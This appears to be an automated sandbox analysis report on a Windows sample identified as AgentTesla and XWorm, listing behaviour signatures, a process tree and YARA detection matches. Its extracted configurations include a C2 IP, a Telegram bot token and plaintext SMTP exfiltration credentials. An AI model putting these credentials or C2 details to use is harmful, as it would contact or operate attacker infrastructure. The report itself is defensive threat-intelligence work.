Edit tour

Windows Analysis Report
DJ5PhUwOsM.exe

Overview

General Information

Sample name:	DJ5PhUwOsM.exe renamed because original name is a hash value
Original sample name:	65ea7c521264d69a5e044a2fa7aa5a330385e733b1cefbff31cb805abaf067fa.exe
Analysis ID:	1562433
MD5:	d61526463472da19dd8869f484a8f4ef
SHA1:	20514ac586fb6847057be18ecf00b84cda7e948f
SHA256:	65ea7c521264d69a5e044a2fa7aa5a330385e733b1cefbff31cb805abaf067fa
Tags:	89-40-31-232exeuser-JAMESWT_MHT
Infos:

Detection

AgentTesla, XWorm

Score:	100
Range:	0 - 100
Whitelisted:	false
Confidence:	100%

Signatures

Antivirus / Scanner detection for submitted sample

Antivirus detection for dropped file

Found malware configuration

Malicious sample detected (through community Yara rule)

Multi AV Scanner detection for dropped file

Multi AV Scanner detection for submitted file

Suricata IDS alerts for network traffic

Yara detected AgentTesla

Yara detected Telegram RAT

Yara detected Telegram Recon

Yara detected XWorm

.NET source code contains method to dynamically call methods (often used by packers)

.NET source code contains potential unpacker

AI detected suspicious sample

C2 URLs / IPs found in malware configuration

Contains functionality to log keystrokes (.Net Source)

Machine Learning detection for dropped file

Machine Learning detection for sample

Protects its processes via BreakOnTermination flag

Queries sensitive network adapter information (via WMI, Win32_NetworkAdapter, often done to detect virtual machines)

Queries sensitive video device information (via WMI, Win32_VideoController, often done to detect virtual machines)

Sample uses string decryption to hide its real strings

Tries to harvest and steal Putty / WinSCP information (sessions, passwords, etc)

Tries to harvest and steal browser information (history, passwords, etc)

Tries to harvest and steal ftp login credentials

Tries to steal Mail credentials (via file / registry access)

Uses the Telegram API (likely for C&C communication)

Yara detected Generic Downloader

AV process strings found (often used to terminate AV products)

Abnormal high CPU Usage

Allocates memory with a write watch (potentially for evading sandboxes)

Checks if Antivirus/Antispyware/Firewall program is installed (via WMI)

Contains long sleeps (>= 3 min)

Creates a process in suspended mode (likely to inject code)

Creates a window with clipboard capturing capabilities

Detected TCP or UDP traffic on non-standard ports

Detected potential crypto function

Dropped file seen in connection with other malware

Drops PE files

Enables debug privileges

Found a high number of Window / User specific system calls (may be a loop to detect user behavior)

HTTP GET or POST without a user agent

IP address seen in connection with other malware

Internet Provider seen in connection with other malware

JA3 SSL client fingerprint seen in connection with other malware

May check the online IP address of the machine

May sleep (evasive loops) to hinder dynamic analysis

Monitors certain registry keys / values for changes (often done to protect autostart functionality)

PE file contains executable resources (Code or Archives)

Queries sensitive BIOS Information (via WMI, Win32_Bios & Win32_BaseBoard, often done to detect virtual machines)

Queries sensitive processor information (via WMI, Win32_Processor, often done to detect virtual machines)

Queries the volume information (name, serial number etc) of a device

Sample file is different than original file name gathered from version info

Sigma detected: Suspicious Outbound SMTP Connections

Uses 32bit PE files

Uses SMTP (mail sending)

Uses a known web browser user agent for HTTP communication

Uses code obfuscation techniques (call, push, ret)

Yara detected Credential Stealer

Yara signature match

Classification

Process Tree

System is w10x64

DJ5PhUwOsM.exe (PID: 6224 cmdline: "C:\Users\user\Desktop\DJ5PhUwOsM.exe" MD5: D61526463472DA19DD8869F484A8F4EF)

FB_7BD8.tmp.exe (PID: 6404 cmdline: "C:\Users\user\AppData\Local\Temp\FB_7BD8.tmp.exe" MD5: A21DF2C0CCA131EB534F520FD641ADB5)

FB_7D21.tmp.exe (PID: 4444 cmdline: "C:\Users\user\AppData\Local\Temp\FB_7D21.tmp.exe" MD5: 068C99328320CAAA7C5F2D31B0FF214B)

cleanup

Malware Threat Intel

Provided by

Name	Description	Attribution	Blogpost URLs	Link
Agent Tesla, AgentTesla	A .NET based information stealer readily available to actors due to leaked builders. The malware is able to log keystrokes, can access the host's clipboard and crawls the disk for credentials or other valuable information. It has the capability to send information back to its C&C via HTTP(S), SMTP, FTP, or towards a Telegram channel.	SWEED	http://blog.nsfocus.net/sweed-611/ http://l1v1ngc0d3.wordpress.com/2021/11/12/agenttesla-dropped-via-nsis-installer/ http://ropgadget.com/posts/originlogger.html http://www.secureworks.com/research/threat-profiles/gold-galleon https://0xmrmagnezi.github.io/malware%20analysis/AgentTesla/	https://malpedia.caad.fkie.fraunhofer.de/details/win.agent_tesla

Name	Description	Attribution	Blogpost URLs	Link
XWorm	Malware with wide range of capabilities ranging from RAT to ransomware.	No Attribution	https://any.run/cybersecurity-blog/xworm-malware-communication-analysis/ https://any.run/cybersecurity-blog/xworm-technical-analysis-of-a-new-malware-version/ https://blog.cyble.com/2022/08/19/evilcoder-project-selling-multiple-dangerous-tools-online/ https://cert.pl/en/posts/2023/10/deworming-the-xworm/ https://embee-research.ghost.io/infrastructure-analysis-with-dns-pivoting/	https://malpedia.caad.fkie.fraunhofer.de/details/win.xworm

Malware Configuration

Threatname: Xworm

{"C2 url": ["89.40.31.232"], "Port": 1717, "Aes key": "1717", "SPL": "<Xwormmm>", "Install file": "USB.exe", "Telegram Token": "5630894183:AAFSNB69Q2a6dw-6XMnWlasTfT2befh82Rk", "Telegram Chatid": "793028759", "Version": "XWorm V5.6"}

Threatname: Agenttesla

{"Exfil Mode": "SMTP", "Port": "587", "Host": "162.254.34.31", "Username": "sendxambro@educt.shop", "Password": "ABwuRZS5Mjh5"}

Yara Signatures

Initial Sample

Source	Rule	Description	Author	Strings
DJ5PhUwOsM.exe	JoeSecurity_TelegramRecon	Yara detected Telegram Recon	Joe Security
DJ5PhUwOsM.exe	JoeSecurity_XWorm	Yara detected XWorm	Joe Security
DJ5PhUwOsM.exe	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
DJ5PhUwOsM.exe	JoeSecurity_AgentTesla_1	Yara detected AgentTesla	Joe Security
DJ5PhUwOsM.exe	JoeSecurity_TelegramRAT	Yara detected Telegram RAT	Joe Security
DJ5PhUwOsM.exe	INDICATOR_SUSPICIOUS_EXE_VaultSchemaGUID	Detects executables referencing Windows vault credential objects. Observed in infostealers	ditekSHen	0x3754b:$s1: 2F1A6504-0641-44CF-8BB5-3612D865F2E5 0x375bd:$s2: 3CCD5499-87A8-4B10-A215-608888DD3B55 0x37647:$s3: 154E23D0-C644-4E6F-8CE6-5069272F999F 0x376d9:$s4: 4BF4C442-9B8A-41A0-B380-DD4A704DDB28 0x37743:$s5: 77BC582B-F0A6-4E15-4E80-61736B6F3B29 0x377b5:$s6: E69D7838-91B5-4FC9-89D5-230D4D4CC2BC 0x3784b:$s7: 3E0E35BE-1B77-43E7-B873-AED901B6275B 0x378db:$s8: 3C886FF3-2669-4AA2-A8FB-3F6759A77548
DJ5PhUwOsM.exe	MALWARE_Win_AsyncRAT	Detects AsyncRAT	ditekSHen	0x4f6b2:$cnc1: Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:66.0) Gecko/20100101 Firefox/66.0 0x4f74f:$cnc2: Mozilla/5.0 (iPhone; CPU iPhone OS 11_4_1 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/11.0 Mobile/15E148 Safari/604.1 0x4f864:$cnc3: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113 Safari/537.36 0x4e720:$cnc4: POST / HTTP/1.1
Click to see the 2 entries

PCAP (Network Traffic)

Source	Rule	Description	Author	Strings
dump.pcap	JoeSecurity_AgentTesla_1	Yara detected AgentTesla	Joe Security
sslproxydump.pcap	JoeSecurity_XWorm_1	Yara detected XWorm	Joe Security

Dropped Files

Source	Rule	Description	Author	Strings
C:\Users\user\AppData\Local\Temp\FB_7D21.tmp.exe	JoeSecurity_XWorm	Yara detected XWorm	Joe Security
C:\Users\user\AppData\Local\Temp\FB_7D21.tmp.exe	JoeSecurity_GenericDownloader_1	Yara detected Generic Downloader	Joe Security
C:\Users\user\AppData\Local\Temp\FB_7D21.tmp.exe	MALWARE_Win_AsyncRAT	Detects AsyncRAT	ditekSHen	0x10bda:$cnc1: Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:66.0) Gecko/20100101 Firefox/66.0 0x10c77:$cnc2: Mozilla/5.0 (iPhone; CPU iPhone OS 11_4_1 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/11.0 Mobile/15E148 Safari/604.1 0x10d8c:$cnc3: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113 Safari/537.36 0xfc48:$cnc4: POST / HTTP/1.1
C:\Users\user\AppData\Local\Temp\FB_7BD8.tmp.exe	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
C:\Users\user\AppData\Local\Temp\FB_7BD8.tmp.exe	JoeSecurity_AgentTesla_1	Yara detected AgentTesla	Joe Security
C:\Users\user\AppData\Local\Temp\FB_7BD8.tmp.exe	INDICATOR_SUSPICIOUS_EXE_VaultSchemaGUID	Detects executables referencing Windows vault credential objects. Observed in infostealers	ditekSHen	0x3347b:$s1: 2F1A6504-0641-44CF-8BB5-3612D865F2E5 0x334ed:$s2: 3CCD5499-87A8-4B10-A215-608888DD3B55 0x33577:$s3: 154E23D0-C644-4E6F-8CE6-5069272F999F 0x33609:$s4: 4BF4C442-9B8A-41A0-B380-DD4A704DDB28 0x33673:$s5: 77BC582B-F0A6-4E15-4E80-61736B6F3B29 0x336e5:$s6: E69D7838-91B5-4FC9-89D5-230D4D4CC2BC 0x3377b:$s7: 3E0E35BE-1B77-43E7-B873-AED901B6275B 0x3380b:$s8: 3C886FF3-2669-4AA2-A8FB-3F6759A77548
Click to see the 1 entries

Memory Dumps

Source	Rule	Description	Author	Strings
00000003.00000000.2070271081.0000000000FA2000.00000002.00000001.01000000.00000007.sdmp	JoeSecurity_XWorm	Yara detected XWorm	Joe Security
00000003.00000000.2070271081.0000000000FA2000.00000002.00000001.01000000.00000007.sdmp	MALWARE_Win_AsyncRAT	Detects AsyncRAT	ditekSHen	0x109da:$cnc1: Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:66.0) Gecko/20100101 Firefox/66.0 0x10a77:$cnc2: Mozilla/5.0 (iPhone; CPU iPhone OS 11_4_1 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/11.0 Mobile/15E148 Safari/604.1 0x10b8c:$cnc3: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113 Safari/537.36 0xfa48:$cnc4: POST / HTTP/1.1
00000002.00000002.4524594091.00000000028D9000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_AgentTesla_1	Yara detected AgentTesla	Joe Security
00000000.00000000.2065512864.0000000000404000.00000002.00000001.01000000.00000003.sdmp	JoeSecurity_XWorm	Yara detected XWorm	Joe Security
00000000.00000000.2065512864.0000000000404000.00000002.00000001.01000000.00000003.sdmp	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
00000000.00000000.2065512864.0000000000404000.00000002.00000001.01000000.00000003.sdmp	JoeSecurity_AgentTesla_1	Yara detected AgentTesla	Joe Security
00000000.00000000.2065512864.0000000000404000.00000002.00000001.01000000.00000003.sdmp	JoeSecurity_TelegramRAT	Yara detected Telegram RAT	Joe Security
00000000.00000000.2065512864.0000000000404000.00000002.00000001.01000000.00000003.sdmp	MALWARE_Win_AsyncRAT	Detects AsyncRAT	ditekSHen	0x4b6b2:$cnc1: Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:66.0) Gecko/20100101 Firefox/66.0 0x4b74f:$cnc2: Mozilla/5.0 (iPhone; CPU iPhone OS 11_4_1 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/11.0 Mobile/15E148 Safari/604.1 0x4b864:$cnc3: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113 Safari/537.36 0x4a720:$cnc4: POST / HTTP/1.1
00000000.00000002.2070672150.0000000000404000.00000002.00000001.01000000.00000003.sdmp	JoeSecurity_XWorm	Yara detected XWorm	Joe Security
00000000.00000002.2070672150.0000000000404000.00000002.00000001.01000000.00000003.sdmp	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
00000000.00000002.2070672150.0000000000404000.00000002.00000001.01000000.00000003.sdmp	JoeSecurity_AgentTesla_1	Yara detected AgentTesla	Joe Security
00000000.00000002.2070672150.0000000000404000.00000002.00000001.01000000.00000003.sdmp	JoeSecurity_TelegramRAT	Yara detected Telegram RAT	Joe Security
00000000.00000002.2070672150.0000000000404000.00000002.00000001.01000000.00000003.sdmp	MALWARE_Win_AsyncRAT	Detects AsyncRAT	ditekSHen	0x4b6b2:$cnc1: Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:66.0) Gecko/20100101 Firefox/66.0 0x4b74f:$cnc2: Mozilla/5.0 (iPhone; CPU iPhone OS 11_4_1 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/11.0 Mobile/15E148 Safari/604.1 0x4b864:$cnc3: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113 Safari/537.36 0x4a720:$cnc4: POST / HTTP/1.1
00000002.00000000.2068435766.00000000004D2000.00000002.00000001.01000000.00000005.sdmp	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
00000002.00000000.2068435766.00000000004D2000.00000002.00000001.01000000.00000005.sdmp	JoeSecurity_AgentTesla_1	Yara detected AgentTesla	Joe Security
00000002.00000002.4524594091.00000000028B1000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
00000002.00000002.4524594091.00000000028B1000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_AgentTesla_1	Yara detected AgentTesla	Joe Security
Process Memory Space: DJ5PhUwOsM.exe PID: 6224	JoeSecurity_XWorm	Yara detected XWorm	Joe Security
Process Memory Space: DJ5PhUwOsM.exe PID: 6224	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
Process Memory Space: DJ5PhUwOsM.exe PID: 6224	JoeSecurity_AgentTesla_1	Yara detected AgentTesla	Joe Security
Process Memory Space: DJ5PhUwOsM.exe PID: 6224	JoeSecurity_TelegramRAT	Yara detected Telegram RAT	Joe Security
Process Memory Space: FB_7BD8.tmp.exe PID: 6404	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
Process Memory Space: FB_7BD8.tmp.exe PID: 6404	JoeSecurity_AgentTesla_1	Yara detected AgentTesla	Joe Security
Process Memory Space: FB_7D21.tmp.exe PID: 4444	JoeSecurity_XWorm	Yara detected XWorm	Joe Security
Process Memory Space: FB_7D21.tmp.exe PID: 4444	JoeSecurity_TelegramRAT	Yara detected Telegram RAT	Joe Security
Click to see the 20 entries

Unpacked PEs

Source	Rule	Description	Author	Strings
0.0.DJ5PhUwOsM.exe.43ead8.2.raw.unpack	JoeSecurity_XWorm	Yara detected XWorm	Joe Security
0.0.DJ5PhUwOsM.exe.43ead8.2.raw.unpack	JoeSecurity_GenericDownloader_1	Yara detected Generic Downloader	Joe Security
0.0.DJ5PhUwOsM.exe.43ead8.2.raw.unpack	MALWARE_Win_AsyncRAT	Detects AsyncRAT	ditekSHen	0x10bda:$cnc1: Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:66.0) Gecko/20100101 Firefox/66.0 0x10c77:$cnc2: Mozilla/5.0 (iPhone; CPU iPhone OS 11_4_1 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/11.0 Mobile/15E148 Safari/604.1 0x10d8c:$cnc3: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113 Safari/537.36 0xfc48:$cnc4: POST / HTTP/1.1
3.0.FB_7D21.tmp.exe.fa0000.0.unpack	JoeSecurity_XWorm	Yara detected XWorm	Joe Security
3.0.FB_7D21.tmp.exe.fa0000.0.unpack	JoeSecurity_GenericDownloader_1	Yara detected Generic Downloader	Joe Security
3.0.FB_7D21.tmp.exe.fa0000.0.unpack	MALWARE_Win_AsyncRAT	Detects AsyncRAT	ditekSHen	0x10bda:$cnc1: Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:66.0) Gecko/20100101 Firefox/66.0 0x10c77:$cnc2: Mozilla/5.0 (iPhone; CPU iPhone OS 11_4_1 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/11.0 Mobile/15E148 Safari/604.1 0x10d8c:$cnc3: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113 Safari/537.36 0xfc48:$cnc4: POST / HTTP/1.1
0.2.DJ5PhUwOsM.exe.43ead8.2.unpack	JoeSecurity_XWorm	Yara detected XWorm	Joe Security
0.2.DJ5PhUwOsM.exe.43ead8.2.unpack	MALWARE_Win_AsyncRAT	Detects AsyncRAT	ditekSHen	0xedda:$cnc1: Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:66.0) Gecko/20100101 Firefox/66.0 0xee77:$cnc2: Mozilla/5.0 (iPhone; CPU iPhone OS 11_4_1 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/11.0 Mobile/15E148 Safari/604.1 0xef8c:$cnc3: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113 Safari/537.36 0xde48:$cnc4: POST / HTTP/1.1
0.2.DJ5PhUwOsM.exe.43ead8.2.raw.unpack	JoeSecurity_XWorm	Yara detected XWorm	Joe Security
0.2.DJ5PhUwOsM.exe.43ead8.2.raw.unpack	JoeSecurity_GenericDownloader_1	Yara detected Generic Downloader	Joe Security
0.2.DJ5PhUwOsM.exe.43ead8.2.raw.unpack	MALWARE_Win_AsyncRAT	Detects AsyncRAT	ditekSHen	0x10bda:$cnc1: Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:66.0) Gecko/20100101 Firefox/66.0 0x10c77:$cnc2: Mozilla/5.0 (iPhone; CPU iPhone OS 11_4_1 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/11.0 Mobile/15E148 Safari/604.1 0x10d8c:$cnc3: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113 Safari/537.36 0xfc48:$cnc4: POST / HTTP/1.1
0.0.DJ5PhUwOsM.exe.43ead8.2.unpack	JoeSecurity_XWorm	Yara detected XWorm	Joe Security
0.0.DJ5PhUwOsM.exe.43ead8.2.unpack	MALWARE_Win_AsyncRAT	Detects AsyncRAT	ditekSHen	0xedda:$cnc1: Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:66.0) Gecko/20100101 Firefox/66.0 0xee77:$cnc2: Mozilla/5.0 (iPhone; CPU iPhone OS 11_4_1 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/11.0 Mobile/15E148 Safari/604.1 0xef8c:$cnc3: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113 Safari/537.36 0xde48:$cnc4: POST / HTTP/1.1
2.0.FB_7BD8.tmp.exe.4d0000.0.unpack	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
2.0.FB_7BD8.tmp.exe.4d0000.0.unpack	JoeSecurity_AgentTesla_1	Yara detected AgentTesla	Joe Security
2.0.FB_7BD8.tmp.exe.4d0000.0.unpack	INDICATOR_SUSPICIOUS_EXE_VaultSchemaGUID	Detects executables referencing Windows vault credential objects. Observed in infostealers	ditekSHen	0x3347b:$s1: 2F1A6504-0641-44CF-8BB5-3612D865F2E5 0x334ed:$s2: 3CCD5499-87A8-4B10-A215-608888DD3B55 0x33577:$s3: 154E23D0-C644-4E6F-8CE6-5069272F999F 0x33609:$s4: 4BF4C442-9B8A-41A0-B380-DD4A704DDB28 0x33673:$s5: 77BC582B-F0A6-4E15-4E80-61736B6F3B29 0x336e5:$s6: E69D7838-91B5-4FC9-89D5-230D4D4CC2BC 0x3377b:$s7: 3E0E35BE-1B77-43E7-B873-AED901B6275B 0x3380b:$s8: 3C886FF3-2669-4AA2-A8FB-3F6759A77548
0.2.DJ5PhUwOsM.exe.4040d0.1.unpack	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
0.2.DJ5PhUwOsM.exe.4040d0.1.unpack	JoeSecurity_AgentTesla_1	Yara detected AgentTesla	Joe Security
0.2.DJ5PhUwOsM.exe.4040d0.1.unpack	INDICATOR_SUSPICIOUS_EXE_VaultSchemaGUID	Detects executables referencing Windows vault credential objects. Observed in infostealers	ditekSHen	0x3167b:$s1: 2F1A6504-0641-44CF-8BB5-3612D865F2E5 0x316ed:$s2: 3CCD5499-87A8-4B10-A215-608888DD3B55 0x31777:$s3: 154E23D0-C644-4E6F-8CE6-5069272F999F 0x31809:$s4: 4BF4C442-9B8A-41A0-B380-DD4A704DDB28 0x31873:$s5: 77BC582B-F0A6-4E15-4E80-61736B6F3B29 0x318e5:$s6: E69D7838-91B5-4FC9-89D5-230D4D4CC2BC 0x3197b:$s7: 3E0E35BE-1B77-43E7-B873-AED901B6275B 0x31a0b:$s8: 3C886FF3-2669-4AA2-A8FB-3F6759A77548
0.0.DJ5PhUwOsM.exe.4040d0.1.unpack	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
0.0.DJ5PhUwOsM.exe.4040d0.1.unpack	JoeSecurity_AgentTesla_1	Yara detected AgentTesla	Joe Security
0.0.DJ5PhUwOsM.exe.4040d0.1.unpack	INDICATOR_SUSPICIOUS_EXE_VaultSchemaGUID	Detects executables referencing Windows vault credential objects. Observed in infostealers	ditekSHen	0x3167b:$s1: 2F1A6504-0641-44CF-8BB5-3612D865F2E5 0x316ed:$s2: 3CCD5499-87A8-4B10-A215-608888DD3B55 0x31777:$s3: 154E23D0-C644-4E6F-8CE6-5069272F999F 0x31809:$s4: 4BF4C442-9B8A-41A0-B380-DD4A704DDB28 0x31873:$s5: 77BC582B-F0A6-4E15-4E80-61736B6F3B29 0x318e5:$s6: E69D7838-91B5-4FC9-89D5-230D4D4CC2BC 0x3197b:$s7: 3E0E35BE-1B77-43E7-B873-AED901B6275B 0x31a0b:$s8: 3C886FF3-2669-4AA2-A8FB-3F6759A77548
0.2.DJ5PhUwOsM.exe.4040d0.1.raw.unpack	JoeSecurity_XWorm	Yara detected XWorm	Joe Security
0.2.DJ5PhUwOsM.exe.4040d0.1.raw.unpack	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
0.2.DJ5PhUwOsM.exe.4040d0.1.raw.unpack	JoeSecurity_GenericDownloader_1	Yara detected Generic Downloader	Joe Security
0.2.DJ5PhUwOsM.exe.4040d0.1.raw.unpack	JoeSecurity_AgentTesla_1	Yara detected AgentTesla	Joe Security
0.2.DJ5PhUwOsM.exe.4040d0.1.raw.unpack	JoeSecurity_TelegramRAT	Yara detected Telegram RAT	Joe Security
0.2.DJ5PhUwOsM.exe.4040d0.1.raw.unpack	INDICATOR_SUSPICIOUS_EXE_VaultSchemaGUID	Detects executables referencing Windows vault credential objects. Observed in infostealers	ditekSHen	0x3347b:$s1: 2F1A6504-0641-44CF-8BB5-3612D865F2E5 0x334ed:$s2: 3CCD5499-87A8-4B10-A215-608888DD3B55 0x33577:$s3: 154E23D0-C644-4E6F-8CE6-5069272F999F 0x33609:$s4: 4BF4C442-9B8A-41A0-B380-DD4A704DDB28 0x33673:$s5: 77BC582B-F0A6-4E15-4E80-61736B6F3B29 0x336e5:$s6: E69D7838-91B5-4FC9-89D5-230D4D4CC2BC 0x3377b:$s7: 3E0E35BE-1B77-43E7-B873-AED901B6275B 0x3380b:$s8: 3C886FF3-2669-4AA2-A8FB-3F6759A77548
0.2.DJ5PhUwOsM.exe.4040d0.1.raw.unpack	MALWARE_Win_AsyncRAT	Detects AsyncRAT	ditekSHen	0x4b5e2:$cnc1: Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:66.0) Gecko/20100101 Firefox/66.0 0x4b67f:$cnc2: Mozilla/5.0 (iPhone; CPU iPhone OS 11_4_1 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/11.0 Mobile/15E148 Safari/604.1 0x4b794:$cnc3: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113 Safari/537.36 0x4a650:$cnc4: POST / HTTP/1.1
0.2.DJ5PhUwOsM.exe.400000.0.unpack	JoeSecurity_XWorm	Yara detected XWorm	Joe Security
0.2.DJ5PhUwOsM.exe.400000.0.unpack	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
0.2.DJ5PhUwOsM.exe.400000.0.unpack	JoeSecurity_AgentTesla_1	Yara detected AgentTesla	Joe Security
0.2.DJ5PhUwOsM.exe.400000.0.unpack	JoeSecurity_TelegramRAT	Yara detected Telegram RAT	Joe Security
0.2.DJ5PhUwOsM.exe.400000.0.unpack	INDICATOR_SUSPICIOUS_EXE_VaultSchemaGUID	Detects executables referencing Windows vault credential objects. Observed in infostealers	ditekSHen	0x3754b:$s1: 2F1A6504-0641-44CF-8BB5-3612D865F2E5 0x375bd:$s2: 3CCD5499-87A8-4B10-A215-608888DD3B55 0x37647:$s3: 154E23D0-C644-4E6F-8CE6-5069272F999F 0x376d9:$s4: 4BF4C442-9B8A-41A0-B380-DD4A704DDB28 0x37743:$s5: 77BC582B-F0A6-4E15-4E80-61736B6F3B29 0x377b5:$s6: E69D7838-91B5-4FC9-89D5-230D4D4CC2BC 0x3784b:$s7: 3E0E35BE-1B77-43E7-B873-AED901B6275B 0x378db:$s8: 3C886FF3-2669-4AA2-A8FB-3F6759A77548
0.2.DJ5PhUwOsM.exe.400000.0.unpack	MALWARE_Win_AsyncRAT	Detects AsyncRAT	ditekSHen	0x4f6b2:$cnc1: Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:66.0) Gecko/20100101 Firefox/66.0 0x4f74f:$cnc2: Mozilla/5.0 (iPhone; CPU iPhone OS 11_4_1 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/11.0 Mobile/15E148 Safari/604.1 0x4f864:$cnc3: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113 Safari/537.36 0x4e720:$cnc4: POST / HTTP/1.1
0.0.DJ5PhUwOsM.exe.400000.0.unpack	JoeSecurity_XWorm	Yara detected XWorm	Joe Security
0.0.DJ5PhUwOsM.exe.400000.0.unpack	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
0.0.DJ5PhUwOsM.exe.400000.0.unpack	JoeSecurity_AgentTesla_1	Yara detected AgentTesla	Joe Security
0.0.DJ5PhUwOsM.exe.400000.0.unpack	JoeSecurity_TelegramRAT	Yara detected Telegram RAT	Joe Security
0.0.DJ5PhUwOsM.exe.400000.0.unpack	INDICATOR_SUSPICIOUS_EXE_VaultSchemaGUID	Detects executables referencing Windows vault credential objects. Observed in infostealers	ditekSHen	0x3754b:$s1: 2F1A6504-0641-44CF-8BB5-3612D865F2E5 0x375bd:$s2: 3CCD5499-87A8-4B10-A215-608888DD3B55 0x37647:$s3: 154E23D0-C644-4E6F-8CE6-5069272F999F 0x376d9:$s4: 4BF4C442-9B8A-41A0-B380-DD4A704DDB28 0x37743:$s5: 77BC582B-F0A6-4E15-4E80-61736B6F3B29 0x377b5:$s6: E69D7838-91B5-4FC9-89D5-230D4D4CC2BC 0x3784b:$s7: 3E0E35BE-1B77-43E7-B873-AED901B6275B 0x378db:$s8: 3C886FF3-2669-4AA2-A8FB-3F6759A77548
0.0.DJ5PhUwOsM.exe.400000.0.unpack	MALWARE_Win_AsyncRAT	Detects AsyncRAT	ditekSHen	0x4f6b2:$cnc1: Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:66.0) Gecko/20100101 Firefox/66.0 0x4f74f:$cnc2: Mozilla/5.0 (iPhone; CPU iPhone OS 11_4_1 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/11.0 Mobile/15E148 Safari/604.1 0x4f864:$cnc3: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113 Safari/537.36 0x4e720:$cnc4: POST / HTTP/1.1
0.0.DJ5PhUwOsM.exe.4040d0.1.raw.unpack	JoeSecurity_XWorm	Yara detected XWorm	Joe Security
0.0.DJ5PhUwOsM.exe.4040d0.1.raw.unpack	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
0.0.DJ5PhUwOsM.exe.4040d0.1.raw.unpack	JoeSecurity_GenericDownloader_1	Yara detected Generic Downloader	Joe Security
0.0.DJ5PhUwOsM.exe.4040d0.1.raw.unpack	JoeSecurity_AgentTesla_1	Yara detected AgentTesla	Joe Security
0.0.DJ5PhUwOsM.exe.4040d0.1.raw.unpack	JoeSecurity_TelegramRAT	Yara detected Telegram RAT	Joe Security
